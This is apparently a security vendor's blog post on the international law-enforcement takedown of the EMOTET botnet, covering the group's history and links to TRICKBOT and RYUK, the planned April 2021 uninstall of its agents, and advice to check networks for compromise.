The EMOTET group has been around for half a decade and has evolved their footprint in the cybercrime world from a banking Trojan to running lucrative business serving other threat actors. That said, the EMOTET group (like other similar groups) is a mafia-like structure and deliver attacks with a high degree of organization. It has successfully attacked a wide variety of companies world-wide and regularly made it to the news headlines. As a result, they are active in the digital underground where access to stolen data from their victims can be trade/bought. Beyond this offer, they also sell access to their victims’ compromised networks to other cybercriminals. It is not surprising to observe other pieces of malware or further attacks being delivered to organizations already compromised via EMOTET as these malware-as-a-service / crime-as-a-service business models are leveraged. For example, lately, EMOTET was associated to other threats including TRICKBOT and RYUK malware, the latter representing one of the most notorious ransomware family.
Below is a typical infection chain involving the delivery of EMOTET:
What has been achieved by the authorities of 8 countries in coordination by EUROPOL and EUROJUST is to be highly valued and celebrated accordingly. It cannot be taken for granted that such international coordination is successful. It also highlights that those authorities are quite effective against cyber criminals. By having taken over the IT infrastructure of EMOTET, this coordinated effort will surely lead to an interruption of EMOTET group activities.
However, this big win doesn’t mean the end of the EMOTET group activities and surely not the end of cybercrime. Without any further information on the status of investigation, it cannot be predicted how decisive it was. Trend Micro is monitoring the situation and will report soon about the impact of this operation. The EMOTET group is faced with the same problem of its victims, that is resilience. It is hoped that the group retires or goes silent or for criminals of this group to hide deeper as they might already have investigators knocking at their doors. Anyhow, it has been proven that its business model works and is very profitable and unfortunately there is no doubt that in some way or another the left void will be filled up again.
In the meantime, while related cybercrime activities may lower down, it is time for one to review its security posture and ensure proper countermeasures are in place. This includes enhancing visibility of suspicious activities that may be indicator of compromise. Trend Micro Vision One may help you to achieve this: https://www.trendmicro.com/en_us/business/products/detection-response.html
On the otherhand, having taken over EMOTET infrastructure, authorities are able to communicate back to EMOTET compromised systems. It has been found that uninstall of EMOTET ‘agents’ is to be triggered by authorities on April 25th, 2021. It is highly recommended that you look for EMOTET related activities within your environment prior to this date in order to conduct proper and deeper investigation aiming at finding out what may have been delivered in addition to EMOTET or what other attack may have been conducted as result of the EMOTET compromise. This task might be more difficult after April 25th, 2021.
Note that a service has been put in place by the Dutch Police that allows you to check if some data in relation to a specific email address has been leaked out:
If you do require any help/support from Trend Micro to go through those tasks, do not hesitate to contact your Trend Micro’s representative.